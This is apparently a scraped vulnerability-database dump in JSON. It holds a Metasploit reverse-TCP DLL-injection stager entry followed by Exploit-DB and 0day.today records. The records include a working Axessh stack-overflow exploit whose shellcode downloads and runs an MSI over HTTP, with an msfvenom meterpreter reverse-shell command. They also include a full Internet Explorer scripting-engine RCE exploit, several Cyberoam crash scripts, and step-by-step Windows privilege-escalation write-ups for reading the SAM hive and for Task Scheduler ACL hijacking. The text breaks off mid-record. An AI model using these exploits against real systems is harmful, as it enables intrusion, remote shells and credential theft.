{"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "591b03e69bf49b22b606bff855740cb7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:28", "history": [{"bulletin": {"description": "Inject a custom DLL into the exploited process. Connect back to the attacker", "viewCount": 8, "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "references": [], "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "", "cvss": {"score": 0.0, "vector": "NONE"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "", "lastseen": "2017-07-02T23:50:14", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/reverse_tcp_rc4_dns", "type": "metasploit", "sourceHref": ""}, "differentElements": ["href"], "edition": 1, "lastseen": "2017-07-02T23:50:14"}], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6FA476CE00BC8482F43AF2BD9937FB32"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815", "CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "kitploit", "idList": ["KITPLOIT:4252843133018759751", "KITPLOIT:9165290622393060450", "KITPLOIT:5834604300745056017", "KITPLOIT:7455761002232864942"]}, {"type": "exploitdb", "idList": ["EDB-ID:46335", "EDB-ID:46334", "EDB-ID:46345", "EDB-ID:46342", "EDB-ID:46343", "EDB-ID:46338", "EDB-ID:46346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107544", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1666-1:43CD3"]}], "modified": "2017-08-21T15:32:28"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "", "sourceData": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}

{"exploitdb": [{"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46922", "href": "https://www.exploit-db.com/exploits/46922", "type": "exploitdb", "title": "Axessh 4.2 - &#039;Log file name&#039; Local Stack-based Buffer Overflow", "sourceData": "# Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow\r\n# Date: May 23rd, 2019\r\n# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)\r\n# Vendor Homepage: http://www.labf.com\r\n# Software Link: http://www.labf.com/download/axessh.exe\r\n# Version v4.2\r\n# Tested on: Windows 7 SP1 EN (x86)\r\n# Reference: https://www.exploit-db.com/exploits/46858\r\n\r\n# TO RUN:\r\n# 0. Setup a multi/handler listener\r\n# 1. Run python script\r\n# 2. Copy contents of axssh.txt\r\n# 3. Open telnet_S.exe\r\n# 4. Select Details >> Settings >> Logging\r\n# 5. Select Log all Session Output radio button\r\n# 6. Paste the contents in Log file name\r\n# 7. Press \"OK\"\r\n# 8. Press \"OK\"\r\n\r\n# EIP offset: 214\r\n# 0x050e3f04 : push esp # ret | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\\Windows\\system32\\ctl3d32.dll)\r\n\r\n\r\n#77da395c - Address of LoadLibraryA() for Windows 7 SPI x86\r\n#777db16f - Address of system() for Windows 7 SPI x86\r\n#77da214f - Address of ExitProcess for Windows 7 SPI x86\r\n\r\n# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281\r\n# Payload command command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi\r\n# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.\r\n\r\n\r\nfilename = \"axssh.txt\"\r\n\r\nmsiScode = \"\\x31\\xc0\\x66\\xb8\\x72\\x74\\x50\\x68\\x6d\\x73\\x76\\x63\\x54\\xbb\\x5c\\x39\\xda\\x77\\xff\\xd3\\x89\\xc5\\x31\\xc0\\x50\\x68\\x20\\x2f\\x71\\x6e\\x68\\x2e\\x6d\\x73\\x69\\x68\\x33\\x2f\\x6d\\x73\\x68\\x36\\x2e\\x31\\x36\\x68\\x38\\x2e\\x31\\x32\\x68\\x32\\x2e\\x31\\x36\\x68\\x2f\\x2f\\x31\\x39\\x68\\x74\\x74\\x70\\x3a\\x68\\x2f\\x69\\x20\\x68\\x68\\x78\\x65\\x63\\x20\\x68\\x6d\\x73\\x69\\x65\\x89\\xe7\\x57\\xb8\\x6f\\xb1\\x7d\\x77\\xff\\xd0\\x31\\xc0\\x50\\xb8\\x4f\\x21\\xda\\x77\"\r\n\r\nevilString = \"\\x90\" * 110 + msiScode + \"\\x90\" * 6 + \"\\x04\\x3f\\x0e\\x05\" + \"\\x90\"*4 + \"\\x89\\xE0\\x83\\xE8\\x7F\\x89\\xC4\\xEB\\x81\" + \"\\x90\" * 800\r\n\r\nfile = open(filename,'w')\r\nfile.write(evilString)\r\nfile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46922"}, {"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46923", "href": "https://www.exploit-db.com/exploits/46923", "type": "exploitdb", "title": "Cyberoam SSLVPN Client 1.3.1.30 - &#039;Connect To Server&#039; Denial of Service (PoC)", "sourceData": "#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-23\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip\r\n#Tested Version: 1.3.1.30\r\n#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: c_sslvpn_cts.py\r\n#2.- Open c_sslvpn_cts.txt and copy content to clipboard\r\n#3.- Open Cyberoam SSLVPN Client\r\n#4.- Select Server Settings \r\n#5.- In \"Connect To Server\" field paste Clipboard\r\n#6.- In \"Port\" type 80\r\n#7.- Select \"OK\"\r\n#8.- Crashed! \r\n\r\ncod = \"\\x41\" * 5000\r\n\r\nf = open('c_sslvpn_cts.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46923"}, {"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46925", "href": "https://www.exploit-db.com/exploits/46925", "type": "exploitdb", "title": "Cyberoam Transparent Authentication Suite 2.1.2.5 - &#039;Fully Qualified Domain Name&#039; Denial of Service (PoC)", "sourceData": "#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-23\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip\r\n#Tested Version: 2.1.2.5\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: ctas_fqdn_2.1.2.5.py\r\n#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard\r\n#3.- Open Cyberoam Transparent Authentication Suite\r\n#4.- Select General > in Domain Type select \"Microsoft Active Directory\"\r\n#5.- In \"Fully Qualified Domain Name\" paste Clipboard\r\n#6.- Click on \"Apply\"\r\n#7.- Crashed! \r\n\r\ncod = \"\\x41\" * 1000\r\n\r\nf = open('ctas_fqdn_2.1.2.5.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46925"}, {"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46927", "href": "https://www.exploit-db.com/exploits/46927", "type": "exploitdb", "title": "Cyberoam General Authentication Client 2.1.2.7 - &#039;Server Address&#039; Denial of Service (PoC)", "sourceData": "#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-23\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip\r\n#Tested Version: 2.1.2.7\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: cgac_2.1.2.7.py\r\n#2.- Open cgac_2.1.2.7.txt and copy content to clipboard\r\n#3.- Open Cyberoam General Authentication Client\r\n#4.- In \"Server Address\" field paste Clipboard\r\n#5.- Click on \"Test\"\r\n#6.- Crashed! \r\n\r\ncod = \"\\x41\" * 256\r\n\r\nf = open('cgac_2.1.2.7.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46927"}, {"lastseen": "2019-05-24T14:21:11", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46928", "href": "https://www.exploit-db.com/exploits/46928", "type": "exploitdb", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption", "sourceData": "<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->\r\n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->\r\n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->\r\n\r\n<!-- Tgroupcrew@gmail.com -->\r\n\r\n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->\r\n<!-- all the way to RCE using no shellcode. -->\r\n\r\n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->\r\n<!-- (h/t: James Forshaw, Google Project Zero) -->\r\n\r\n<html>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\">\r\n<meta http-equiv=\"Expires\" content=\"-1\">\r\n<body>\r\n\t<div id=\"container1\" style=\"overflow:scroll; width: 10px\">\r\n\t\t<div id=\"content1\" style=\"width:5000000px\">\r\n\t\t\tContent\r\n\t\t</div>\r\n\t</div>\r\n<script language=\"VBScript.Encode\">\r\nDim ar1(&h3000000)\r\nDim ar2(1000)\r\nDim gremlin\r\naddressOfGremlin = &h28281000\r\nClass MyClass\r\n\tPrivate mValue\r\n\tPublic Property Let Value(v)\r\n\t\tmValue = v\r\n\tEnd Property\r\n\tPublic Default Property Get P\r\n\t\tP = mValue\t\t\t\t' Where to write\r\n\tEnd Property\r\nEnd Class\r\nSub TriggerWrite(where, val)\r\n\tDim v1\r\n\tSet v1 = document.getElementById(\"container1\")\r\n\tv1.scrollLeft = val\t\t' Write this value (Maximum: 0x001767dd)\r\n\tDim c\r\n\tSet c = new MyClass\r\n\tc.Value = where\r\n\tSet v1.scrollLeft = c\r\nEnd Sub\r\n' Our vulnerability does not immediately give us an unrestricted\r\n' write (though we could manufacture one). For our purposes, the\r\n' following is sufficient. It writes an arbitrary DWORD to an\r\n' arbitrary location, and sets the subsequent 3 bytes to zero.\r\nSub WriteInt32With3ByteZeroTrailer(addr, val)\r\n\tTriggerWrite addr , (val) AND &hff\r\n\tTriggerWrite addr + 1, (val\\&h100) AND &hff\r\n\tTriggerWrite addr + 2, (val\\&h10000) AND &hff\r\n\tTriggerWrite addr + 3, (val\\&h1000000) AND &hff\r\nEnd Sub\r\nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str)\r\n\tFor i = 0 To Len(str) - 1\r\n\t\tTriggerWrite addr + i, Asc(Mid(str, i + 1, 1))\r\n\tNext\r\nEnd Sub\r\nFunction ReadInt32(addr)\r\n\tWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr\r\n\tReadInt32 = ar1(gremlin)\r\nEnd Function\r\nFunction LeakAddressOfObject(obj)\r\n\tSet ar1(gremlin + 1) = obj\r\n\tLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)\r\nEnd Function\r\nSub Exploit()\r\n\t' Corrupt vt of one array element (the \"gremlin\")\r\n\tTriggerWrite addressOfGremlin, &h4003\t' VT_BYREF | VT_I4\r\n\tFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100\r\n\t\tIf Not IsEmpty(ar1(i)) Then\r\n\t\t\tgremlin = i\r\n\t\t\tExit For\r\n\t\tEnd If\r\n\tNext\r\n\t\r\n\tIf IsEmpty(gremlin) Then\r\n\t\tMsgBox \"Could not find gremlin\"\r\n\t\tExit Sub\r\n\tEnd If\r\n\t\r\n\tFor i = 0 To UBound(ar2)\r\n\t\tSet ar2(i) = CreateObject(\"Scripting.Dictionary\")\r\n\tNext\r\n\t\r\n\tSet dict = ar2(UBound(ar2) / 2)\r\n\taddressOfDict = LeakAddressOfObject(dict)\r\n\tvtableOfDict = ReadInt32(addressOfDict)\r\n\tscrrun = vtableOfDict - &h11fc\r\n\tkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90\r\n\twinExec = kernel32 + &h5d380\r\n\t\r\n\tdict.Exists \"dummy\"\t\t' Make a dispatch call, just to populate pld\r\n\t' Relocate pld to ensure its address doesn't contain a null byte\r\n\tpld = ReadInt32(addressOfDict + &h3c)\r\n\tfakePld = &h28281020\r\n\tFor i = 0 To 3 - 1\r\n\t\tWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)\r\n\tNext\r\n\t\r\n\tfakeVtable = &h28282828\t\t' ASCII \"((((\"\r\n\tFor i = 0 To 21\r\n\t\tIf i = 12 Then\t\t' Dictionary.Exists\r\n\t\t\tfptr = winExec\r\n\t\tElse\r\n\t\t\tfptr = ReadInt32(vtableOfDict + 4 * i)\r\n\t\tEnd If\r\n\t\tWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr\r\n\tNext\r\n\t\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\tWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\"\r\n\t\r\n\tOn Error Resume Next\r\n\tdict.Exists \"dummy\"\t\t' Wheeee!!\r\n\t\r\n\t' A little cleanup to help prevent crashes after the exploit\r\n\tFor i = 1 To 3\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2\r\n\tNext\r\n\tErase Dict\r\n\tErase ar2\r\nEnd Sub\r\nExploit\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46928"}, {"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46926", "href": "https://www.exploit-db.com/exploits/46926", "type": "exploitdb", "title": "Cyberoam Transparent Authentication Suite 2.1.2.5 - &#039;NetBIOS Name&#039; Denial of Service (PoC)", "sourceData": "#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-23\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip\r\n#Tested Version: 2.1.2.5\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: ctas_nn_2.1.2.5.py\r\n#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard\r\n#3.- Open Cyberoam Transparent Authentication Suite\r\n#4.- Select General > in Domain Type select \"Microsoft Active Directory\"\r\n#5.- In \"NetBIOS Name\" Paste Clipboard\r\n#6.- Click on \"Apply\"\r\n#7.- Crashed! \r\n\r\ncod = \"\\x41\" * 1500\r\n\r\nf = open('ctas_nn_2.1.2.5.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46926"}, {"lastseen": "2019-05-24T12:19:39", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "EDB-ID:46924", "href": "https://www.exploit-db.com/exploits/46924", "type": "exploitdb", "title": "Cyberoam SSLVPN Client 1.3.1.30 - &#039;HTTP Proxy&#039; Denial of Service (PoC)", "sourceData": "#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-23\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip\r\n#Tested Version: 1.3.1.30\r\n#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: c_sslvpn_http.py\r\n#2.- Open c_sslvpn_http.txt and copy content to clipboard\r\n#3.- Open Cyberoam SSLVPN Client\r\n#4.- Select Proxy Settings > Enable \"Manual Configuration\"\r\n#5.- In \"HTTP Proxy\" address field paste Clipboard\r\n#6.- In \"Port\" type 80\r\n#7.- Select \"OK\"\r\n#8.- Crashed! \r\n\r\ncod = \"\\x41\" * 5000\r\n\r\nf = open('c_sslvpn_http.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46924"}], "zdt": [{"lastseen": "2019-05-24T15:56:52", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32791", "href": "https://0day.today/exploit/description/32791", "title": "Microsoft Windows 10 1809 - CmKeyBodyRemapToVirtualForEnum Arbitrary Key Enumeration", "type": "zdt", "sourceData": "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation\r\n\r\n\r\nWindows: CmKeyBodyRemapToVirtualForEnum Arbitrary Key Enumeration EoP\r\nPlatform: Windows 10 1809 (not tested earlier)\r\nClass: Elevation of Privilege\r\nSecurity Boundary (per Windows Security Service Criteria): User boundary\r\n\r\nSummary: \r\n\r\nThe kernel\u2019s Registry Virtualization doesn\u2019t safely open the real key for a virtualization location leading to enumerating arbitrary keys resulting in EoP.\r\n\r\nDescription:\r\n\r\nWhen the virtualization flag is set on the primary token certain parts of the HKLM\\Software hive are virtualized to a per-user location under Software\\Classes. If the key exists in HKLM (and can be virtualized) then a handle to the HKLM key is opened read-only and the virtualized key is only created if any modification is made to the key, such as writing a value.\r\n\r\nHowever, if a virtualized key already exists then that key is opened and the real key is only opened on demand. One reason to open the backing key is if the virtual key is enumerated, to provide compatibility the kernel will merge the key/value information from the real key into the virtual key. The real key is opened every time a call is made to NtEnumerateKey, NtQueryValue etc.\r\n\r\nThe open of the real key is performed in CmKeyBodyRemapToVirtualForEnum. It first constructs the real path to the key using CmpReparseToVirtualPath then opens the key object using ObReferenceObjectByName. The problem here is two fold:\r\n1) The access mode passed to ObReferenceObjectByName is KernelMode which means security checking is disabled.\r\n2) The open operation will follow symbolic links in the registry.\r\n\r\nWhen combined together these two issues allow a normal user to redirect a real key to an arbitrary registry location, as security checking is disabled then it will open any key including the SAM or BCD hives. The only requirement is finding a virtualizable key inside HKLM which is writable by the normal user. There\u2019s a number of examples of this, but the easiest and ironic one to exploit is the HKLM\\SOFTWARE\\Microsoft\\DRM key. In order to get the virtualization to work you do need to create a new subkey, without any virtualization flags (the DRM key can be virtualized anyway) with a security descriptor which limits the user to read-only but grants the administrator group full access. This will meet the virtualization criteria, and as the key is in HKLM which is a trusted hive then any symbolic link can reparse to any other hive. This can be exploited as follows:\r\n\r\n1) Create a new subkey of DRM which can only be written to by an administrator (just pass an appropriate security descriptor). This should be done with virtualization disabled.\r\n2) Open the new subkey requesting read and write access with virtualization enabled. Write a value to the key to cause it to be virtualized then close it.\r\n3) Reopen the subkey requesting read and write access with virtualization enabled.\r\n4) Replace the new subkey in DRM with a symlink to \\Registry\\Machine\\SAM\\SAM. \r\n5) Enumerate keys or values of the virtual key, it should result in the SAM hive being opened and enumerated. Repeat the process to dump all data from the hive as needed.\r\n\r\nFixing wise, I\u2019m not really sure why the real key is opened without any access checking as the code should have already checked that the user could open the real key for read-only in order to create the virtual key and if the call fails it doesn\u2019t seem to impact the enumeration process, just it doesn\u2019t return the data. You might try and block symbolic link reparsing, but passing OBJ_OPEN_LINK isn\u2019t sufficient as you could replace a key higher up the key path which is the actual symbolic link.\r\n\r\nThese operations can\u2019t be done from any sandbox that I know of so it\u2019s only a user to system privilege escalation. \r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. It will use the vulnerability to enumerate the top level of the SAM hive.\r\n\r\n1) Compile the C# project. It\u2019ll need to pull NtApiDotNet from NuGet to build.\r\n2) As a normal user run the PoC. \r\n3) The PoC should print the subkeys of the SAM hive.\r\n\r\nExpected Result:\r\nThe query operation should fail.\r\n\r\nObserved Result:\r\nThe SAM hive key is opened and enumerated.\r\n\r\nSome additional notes.\r\n\r\nI said this wasn\u2019t exploitable from a sandbox but that turns out to be incorrect. It\u2019s possible to mark a registry key as being a virtual store key using NtSetInformationKey with the KeySetVirtualizationInformation and passing a value of 1. When you do this the kernel always considers it to be a virtualized key for the purposes of enumeration, as long as the virtualization enabled flag is set when calling NtEnumerateKey it\u2019ll call CmKeyBodyRemapToVirtualForEnum. \r\n\r\nThe path to the real registry key is generated by CmVirtualKCBToRealPath (not CmpReparseToVirtualPath as I said in the original report as that's the other direction) which just removes the first 4 path elements from the virtual key path and prepends \\Registry. For example if you open the key \\Registry\\User\\S-1-1-1\\SOFTWARE\\MACHINE\\XYZ it\u2019ll get mapped to \\Registry\\MACHINE\\XYZ. \r\n\r\nYou can exploit this in an AC by creating a new application hive through RegLoadAppKey which will be mapped to \\Registry\\A\\XYZ then creating a directory structure underneath that. For example if you load the app key, then create the subkeys ABC\\MACHINE\\SAM\\SAM and mark the last one as a virtualized key then when opened with virtualization enabled you can now enumerate the SAM hive. I expect this can even be done from an Microsoft Edge Content Process as loading an application hive isn\u2019t restricted, in fact it\u2019s important for AC functionality.\r\n\r\nThere\u2019s a few places that call CmVirtualKCBToRealPath so I\u2019d probably check their usage is correct as this behavior is odd. Of course I\u2019d argue that CmVirtualKCBToRealPath should be more rigorous and also at a minimum you probably shouldn\u2019t be able to set virtualization flags on application hives in general.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46912.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32791"}, {"lastseen": "2019-05-24T15:56:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32790", "href": "https://0day.today/exploit/description/32790", "title": "Microsoft Windows - Win32k Local Privilege Escalation Exploit", "type": "zdt", "sourceData": "# CVE-2019-0803\r\nWin32k Elevation of Privilege Poc\r\n\r\nReference\r\n-----------------------------\r\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\r\n\r\n\r\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32790"}, {"lastseen": "2019-05-24T15:56:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32789", "href": "https://0day.today/exploit/description/32789", "title": "Microsoft Windows (x84) - Task Scheduler (.job) Import Arbitrary Discretionary Access Control List", "type": "zdt", "sourceData": "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation\r\n\r\n\r\nTask Scheduler .job import arbitrary DACL write\r\n\r\nTested on: Windows 10 32-bit\r\n\r\nBug information:\r\n\r\nThere are two folders for tasks.\r\n\r\nc:\\windows\\tasks\r\n\r\nc:\\windows\\system32\\tasks\r\n\r\nThe first one is only there for legacy purposes. The second one gets used by the task scheduler.\r\n\r\nIn the old days (i.e windows xp) tasks would be placed in c:\\windows\\tasks in the \".job\" fileformat. \r\n\r\nIf on windows 10 you want to import a .job file into the task scheduler you have to copy your old .job files into c:\\windows\\tasks and run the following command using \"schtasks.exe and schedsvc.dll\" copied from the old system: \"schtasks /change /TN \"taskname\" /RU username /RP password\" \r\n\r\n(found this here: https://social.technet.microsoft.com/Forums/windowsserver/en-US/467e5cab-2368-42de-ae78-d86b644a0e71/transfer-scheduled-tasks-to-server-2008?forum=winserverMigration)\r\n\r\nThis will result in a call to the following RPC \"_SchRpcRegisterTask\", which is exposed by the task scheduler service. (I assume that to trigger this bug you can just call into this function directly without using that schtasks.exe copied from windows xp.. but I am not great at reversing :( )\r\n\r\nIt starts out by impersonating the current user.\r\n\r\nBut when it hits the following function: \r\n\r\nint __stdcall tsched::SetJobFileSecurityByName(LPCWSTR StringSecurityDescriptor, const unsigned __int16 *, int, const unsigned __int16 *)\r\n\r\nIt starts impersonating itself (NT AUTHORITY\\SYSTEM)! \r\n\r\nAnd then calls SetSecurityInfo on a task it created in c:\\windows\\system32\\tasks.\r\n\r\n\r\n\r\n\r\nThis can be easily abused.\r\n\r\nThe PoC code:\r\n\r\nCopyFile(L\"bear.job\", L\"c:\\\\windows\\\\tasks\\\\bear.job\",FALSE);\r\n\tsystem(command.c_str());\r\n\tDeleteFile(L\"c:\\\\windows\\\\system32\\\\tasks\\\\Bear\");\r\n\tCreateNativeHardlink(L\"c:\\\\windows\\\\system32\\\\tasks\\\\bear\", L\"C:\\\\Windows\\\\system32\\\\drivers\\\\pci.sys\");\r\n\tsystem(command.c_str());\r\n\r\nFirst we copy bear .job into the legacy tasks folder.\r\n\r\nThen we call \"schtasks /change /TN \"bear\" /RU username /RP password\" \r\n\r\nWe have to call it \"normally\" first without planting a hardlink because otherwise it will fail, since the task already exists in c:\\windows\\system32\\task.\r\n\r\nAfter that we delete the file it created. And plant a hardlink and re-run the same command.\r\n\r\nThis time it will call SetSecurityInfo on our hardlink.\r\n\r\nHow to run the PoC (you need to rebuild for x64, included binary is x86)\r\n\r\n1. copy polarbear.exe, bear.job, schtasks.exe, schtasks.dll from the folder \"poc files\" to your test VM\r\n\r\n2. run polarbear.exe passing a username and password of a local non admin account. I.e \"polarbear.exe essbee polarbear\"\r\n\r\nYou can use the included video demo as reference.\r\n\r\nSolution?\r\n\r\nMake sure it impersonates the user! :D\r\n\r\nLimitations\r\n\r\nObviously to run to PoC we have to pass a username and password. However, this can be the account information of a local non admin account, meaning it still crosses a security boundary. But for malware it would be harder to use this, since it's not that easy to obtain a cleartext password and even if we call _SchRpcRegisterTask directly, it still has a struct _TASK_USER_CRED argument, and I assume this expects clear text account info and not a token or something. Maybe you can use the Guest account or something when calling _schrpcregistertask directly.\r\n\r\nEDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46918.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": 